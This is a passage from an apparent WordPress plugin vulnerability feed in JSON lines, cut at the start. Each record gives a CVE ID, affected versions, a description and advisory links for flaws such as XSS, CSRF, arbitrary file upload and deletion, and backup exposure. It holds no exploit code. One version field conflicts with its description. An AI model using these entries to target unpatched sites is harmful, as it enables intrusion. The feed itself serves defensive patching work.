rdpress.org\\\/browser\\\/html5-audio-player\\\/trunk\\\/inc\\\/elementor-widgets\\\/playlist.php#L541\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4775","slug":"geodirectory","versionEndExcluding":"2.2.22","description":"The GeoDirectory WordPress plugin before 2.2.22 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ab3fc58-7d1c-4bcd-8bbd-86c62a3f979c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ab3fc58-7d1c-4bcd-8bbd-86c62a3f979c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13449","slug":"boom-fest","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The Boom Fest plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'bf_admin_action' function in all versions up to, and including, 2.2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update plugin settings that change the appearance of the website.","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boom-fest\\\/trunk\\\/admin\\\/class-boom-fest-admin.php#L174\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boom-fest\\\/trunk\\\/admin\\\/class-boom-fest-admin.php#L174\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227296\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227296\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/246a66ea-7f2f-44e6-825b-5556eacc33ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/246a66ea-7f2f-44e6-825b-5556eacc33ab?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4483","slug":"email-encoder-bundle","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The Email Encoder WordPress plugin before 2.2.2 does not escape the WP_Email_Encoder_Bundle_options[protection_text] parameter before outputting it back in an attribute in an admin page, leading to Stored Cross-Site Scripting.","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f2ac76c-f3f8-41f9-a32a-f414825cf6f1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f2ac76c-f3f8-41f9-a32a-f414825cf6f1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"popup-box","versionEndExcluding":"2.2.2","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6256","slug":"feeds-for-youtube","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The Feeds for YouTube (YouTube video, channel, and gallery plugin) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'youtube-feed' shortcode in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/228fab65-e5c2-41d1-ad41-fac4862894f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/228fab65-e5c2-41d1-ad41-fac4862894f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feeds-for-youtube\\\/trunk\\\/js\\\/sb-youtube.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feeds-for-youtube\\\/trunk\\\/js\\\/sb-youtube.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107577\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107577\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11361","slug":"pdf-invoicing-for-woocommerce","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The PDF Invoices & Packing Slips Generator for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-invoicing-for-woocommerce\\\/tags\\\/2.2.1\\\/includes\\\/class-alg-wc-pdf-invoicing-admin.php#L213\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-invoicing-for-woocommerce\\\/tags\\\/2.2.1\\\/includes\\\/class-alg-wc-pdf-invoicing-admin.php#L213\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-invoicing-for-woocommerce\\\/tags\\\/2.2.1\\\/includes\\\/class-alg-wc-pdf-invoicing-admin.php#L244\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-invoicing-for-woocommerce\\\/tags\\\/2.2.1\\\/includes\\\/class-alg-wc-pdf-invoicing-admin.php#L244\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194265%40pdf-invoicing-for-woocommerce&new=3194265%40pdf-invoicing-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194265%40pdf-invoicing-for-woocommerce&new=3194265%40pdf-invoicing-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f01ecce1-cff1-41a6-ae90-3ace8b2e3a36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f01ecce1-cff1-41a6-ae90-3ace8b2e3a36?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12412","slug":"booking-and-rental-manager-for-woocommerce","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The Rental and Booking Manager for Bike, Car, Dress, Resort with WooCommerce Integration \u2013 WpRently | WordPress plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018active_tab\u2019 parameter in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-and-rental-manager-for-woocommerce\\\/trunk\\\/templates\\\/template_segment\\\/resort_info.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-and-rental-manager-for-woocommerce\\\/trunk\\\/templates\\\/template_segment\\\/resort_info.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0cde64f-2533-46e0-9268-b9d100fb0a82?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0cde64f-2533-46e0-9268-b9d100fb0a82?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1136","slug":"responsive-coming-soon","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The Coming Soon Page & Maintenance Mode plugin for WordPress is vulnerable to unauthorized access of data due to an improperly implemented URL check in the wpsm_coming_soon_redirect function in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to bypass maintenance mode or coming-soon mode and view the site's content.","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3c52d6e-b3f4-4ba8-aee4-b9f11704e1de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3c52d6e-b3f4-4ba8-aee4-b9f11704e1de?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-coming-soon\\\/trunk\\\/redirect.php#L11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-coming-soon\\\/trunk\\\/redirect.php#L11\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28665","slug":"woo-bulk-price-update","versionEndExcluding":"2.2.2","description":"The Woo Bulk Price Update WordPress plugin, in versions < 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-3\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9765","slug":"ekc-tournament-manager","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The EKC Tournament Manager WordPress plugin before 2.2.2 allows a logged in admin to download system files outside of the WordPress directory","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c86157b0-43f3-4e82-9697-7dd9401b48d6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c86157b0-43f3-4e82-9697-7dd9401b48d6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9711","slug":"ekc-tournament-manager","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The EKC Tournament Manager WordPress plugin before 2.2.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/daee95c5-006e-4a83-b92a-7faa3e89d985\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/daee95c5-006e-4a83-b92a-7faa3e89d985\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9709","slug":"ekc-tournament-manager","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The EKC Tournament Manager WordPress plugin before 2.2.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9d535434-6512-44cb-8198-c105062df2b8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9d535434-6512-44cb-8198-c105062df2b8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0592","slug":"related-posts-for-wp","versionEndExcluding":"2.2.2","description":"The Related Posts for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1. This is due to missing or incorrect nonce validation on the handle_create_link() function. This makes it possible for unauthenticated attackers to add related posts to other posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This ultimately makes it possible for attackers to view draft and password protected posts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d21aad7-dbee-4204-afbd-0a5fdeaca50e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d21aad7-dbee-4204-afbd-0a5fdeaca50e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/related-posts-for-wp\\\/trunk\\\/classes\\\/hooks\\\/class-hook-link-related-screen.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/related-posts-for-wp\\\/trunk\\\/classes\\\/hooks\\\/class-hook-link-related-screen.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3049719\\\/related-posts-for-wp\\\/tags\\\/2.2.2\\\/classes\\\/hooks\\\/class-hook-link-related-screen.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3049719\\\/related-posts-for-wp\\\/tags\\\/2.2.2\\\/classes\\\/hooks\\\/class-hook-link-related-screen.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7500","slug":"ocean-social-sharing","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The Ocean Social Sharing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via social icon titles in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-social-sharing\\\/tags\\\/2.2.1\\\/template\\\/social-share.php#L100\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-social-sharing\\\/tags\\\/2.2.1\\\/template\\\/social-share.php#L100\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-social-sharing\\\/tags\\\/2.2.1\\\/template\\\/social-share.php#L176\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-social-sharing\\\/tags\\\/2.2.1\\\/template\\\/social-share.php#L176\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-social-sharing\\\/tags\\\/2.2.1\\\/template\\\/social-share.php#L262\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-social-sharing\\\/tags\\\/2.2.1\\\/template\\\/social-share.php#L262\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-social-sharing\\\/tags\\\/2.2.1\\\/template\\\/social-share.php#L84\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-social-sharing\\\/tags\\\/2.2.1\\\/template\\\/social-share.php#L84\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3331993%40ocean-social-sharing&new=3331993%40ocean-social-sharing&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3331993%40ocean-social-sharing&new=3331993%40ocean-social-sharing&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7683e708-b7cb-444e-9069-f33e4ef3ac76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7683e708-b7cb-444e-9069-f33e4ef3ac76?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0379","slug":"custom-twitter-feeds","versionEndExcluding":"2.2.2","description":"The Custom Twitter Feeds \u2013 A Tweets Widget or X Feed Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1. This is due to missing or incorrect nonce validation on the ctf_auto_save_tokens function. This makes it possible for unauthenticated attackers to update the site's Twitter API token and secret via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29e2ff11-053b-45cc-adf1-d276f1ee576e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29e2ff11-053b-45cc-adf1-d276f1ee576e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-twitter-feeds\\\/trunk\\\/custom-twitter-feed.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-twitter-feeds\\\/trunk\\\/custom-twitter-feed.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032345%40custom-twitter-feeds%2Ftrunk&new=3032345%40custom-twitter-feeds%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032345%40custom-twitter-feeds%2Ftrunk&new=3032345%40custom-twitter-feeds%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-30498","slug":"codeflavors-vimeo-video-post-lite","versionEndExcluding":"2.2.2","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in CodeFlavors Vimeotheque: Vimeo WordPress Plugin <=\u00a02.2.1 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/codeflavors-vimeo-video-post-lite\\\/wordpress-vimeotheque-plugin-2-2-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/codeflavors-vimeo-video-post-lite\\\/wordpress-vimeotheque-plugin-2-2-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2178","slug":"aajoda-testimonials","versionEndExcluding":"2.2.2","description":"The Aajoda Testimonials WordPress plugin before 2.2.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e84b71f9-4208-4efb-90e8-1c778e7d2ebb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e84b71f9-4208-4efb-90e8-1c778e7d2ebb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7341","slug":"ht-contactform","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the temp_file_delete() function in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Services\\\/FileManager.php#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Services\\\/FileManager.php#L107\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3326887\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Ajax.php?contextall=1&old=3316109&old_path=%2Fht-contactform%2Ftrunk%2Fadmin%2FIncludes%2FAjax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3326887\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Ajax.php?contextall=1&old=3316109&old_path=%2Fht-contactform%2Ftrunk%2Fadmin%2FIncludes%2FAjax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32da04ba-bee3-4fd3-b91b-57e588d5f4e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32da04ba-bee3-4fd3-b91b-57e588d5f4e4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7340","slug":"ht-contactform","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the temp_file_upload function in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Services\\\/FileManager.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Services\\\/FileManager.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3326887\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Services\\\/FileManager.php?contextall=1&old=3316109&old_path=%2Fht-contactform%2Ftrunk%2Fadmin%2FIncludes%2FServices%2FFileManager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3326887\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Services\\\/FileManager.php?contextall=1&old=3316109&old_path=%2Fht-contactform%2Ftrunk%2Fadmin%2FIncludes%2FServices%2FFileManager.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0cb666b-bfab-492f-a74e-11dc9b171136?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0cb666b-bfab-492f-a74e-11dc9b171136?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5772","slug":"debug-log-manager","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The Debug Log Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1. This is due to missing or incorrect nonce validation on the clear_log() function. This makes it possible for unauthenticated attackers to clear the debug log via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e539549-1125-4b0e-aa3c-c8844041c23a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e539549-1125-4b0e-aa3c-c8844041c23a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debug-log-manager\\\/tags\\\/2.2.0\\\/classes\\\/class-debug-log.php#L822\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debug-log-manager\\\/tags\\\/2.2.0\\\/classes\\\/class-debug-log.php#L822\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debug-log-manager\\\/tags\\\/2.2.2\\\/classes\\\/class-debug-log.php#L828\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debug-log-manager\\\/tags\\\/2.2.2\\\/classes\\\/class-debug-log.php#L828\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-1601","slug":"user-access-manager","versionEndExcluding":"2.2.18","description":"The User Access Manager WordPress plugin before 2.2.18 prioritizes getting a visitor's IP from certain HTTP headers over PHP's REMOTE_ADDR, which makes it possible for attackers to access restricted content in certain situations.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f6d3408c-2ceb-4a89-822b-13f5272a5fce\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f6d3408c-2ceb-4a89-822b-13f5272a5fce\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6910","slug":"eventon-lite","versionImpact":"2.2.16","versionEndExcluding":"2.2.17","description":"The EventON WordPress plugin before 2.2.17 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.","recommendation":"Update to version 2.2.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/468373c6-7e47-489a-92c1-75025c543fd5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/468373c6-7e47-489a-92c1-75025c543fd5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10028","slug":"everest-backup","versionImpact":"2.2.13","versionEndExcluding":"2.2.14","description":"The Everest Backup \u2013 WordPress Cloud Backup, Migration, Restore & Cloning Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.13 via the exposed process stats file during the backup process. This makes it possible for unauthenticated attackers to obtain an archive file name and download the site's backup.","recommendation":"Update to version 2.2.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b871957-a2b3-492f-b461-7040d9098b2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b871957-a2b3-492f-b461-7040d9098b2b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/everest-backup\\\/tags\\\/2.2.13\\\/inc\\\/classes\\\/class-backup-directory.php#L514\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/everest-backup\\\/tags\\\/2.2.13\\\/inc\\\/classes\\\/class-backup-directory.php#L514\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6850","slug":"carousel-slider","versionImpact":"2.2.13","versionEndExcluding":"2.2.14","description":"The Carousel Slider WordPress plugin before 2.2.4 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 2.2.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c06995cb-1685-4751-811f-aead52a597a7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c06995cb-1685-4751-811f-aead52a597a7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6020","slug":"sign-up-sheets","versionImpact":"2.2.12","versionEndExcluding":"2.2.13","description":"The Sign-up Sheets WordPress plugin before 2.2.13 does not escape some generated URLs, as well as the $_SERVER['REQUEST_URI'] parameter before outputting them back in attributes, which could lead to Reflected Cross-Site Scripting.","recommendation":"Update to version 2.2.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3526320-3abd-4ddb-8f73-778741bd9c48\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f3526320-3abd-4ddb-8f73-778741bd9c48\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
